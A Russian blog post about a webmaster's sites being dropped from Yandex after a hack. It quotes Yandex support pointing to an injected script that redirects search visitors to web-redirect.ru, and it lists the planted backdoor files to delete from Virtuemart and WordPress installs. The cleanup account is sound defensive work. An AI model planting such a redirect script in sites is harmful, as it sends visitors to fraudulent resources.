Вредоносный код script type=»text/javascript»> location.replace(«http://web-redirect.ru/?web»);

Обнаружил выпадение из индекса поисковой системы Яндекс некоторых своих сайтов, которые находились на одном хостинге, в одном аккаунте.

Среди сайтов, которые не находились Яндексом были интернет-магазины на Virtuemart 2, Virtuemart 1, сайты без CMS (на голом HTML) и этот блог на WordPress. Смущало то, что в панели вебмастера Яндекса отображалось, что в индексе есть страницы. Написал письмо в саппорт Яндекса, получил следующий ответ:

Здравствуйте, aktual!
 
Наши автоматические методы обнаружили на Вашем сайте подобный программный код:
 
"script type="text/javascript">location.replace("http://web-redirect.ru/?web");</script" ,
 
с помощью которого пользователи перенаправляются на мошеннические ресурсы при переходе на страницы Вашего сайта из поисковой системы. Возможно, данная ситуация связана с несанкционированным доступом к сайту (и к серверу) посторонних лиц. Так как другие Ваши сайты находятся на том же сервере, проблемы у них, скорее всего, аналогичные.
 
В соответствии с http://help.yandex.ru/webmaster/yandex-indexing/quality-site.xml мы стараемся не индексировать или не ранжировать высоко страницы и сайты, перенаправляющие пользователя на другой ресурс, автоматически («редирект») или добровольно.
 
В случае, если нарушение не повторится, сайт сможет восстановиться в результатах поиска автоматически.
 
К сожалению, количество страниц в поиске иногда может отображаться сервисом Яндекс Вебмастер неверно. Наши специалисты уже работают над устранением данной ошибки. Приносим свои извинения за доставленные неудобства. В подобных ситуациях ориентируйтесь на перечень страниц в разделе Вебмастера "Страницы в поиске".
 
--
С уважением, Платон Щукин
Служба поддержки Яндекса

Ситуация с наличием страниц в индексе в панели вебмастера прояснилась. Но вредоносный код пришлось искать. Список файлов, которые надо удалить:

Для Virtuemart 1 и 2:

\components\com_content\articled.php

\components\com_content\category.php

Для WordPress:

\wp-includes\class-category.php

\wp-includes\class-wp-default.php

Для всех сайтов — лежали везде, где можно, ищите по всему сайту:

com_checker.php

inc.class.php

all.html

result.html

Также, прикрепляю архив со всеми файлами, если надо посмотреть содержимое — вирусов нет, можно смело качать. files.zip

Категория: Virtuemart 2
Comments are disabled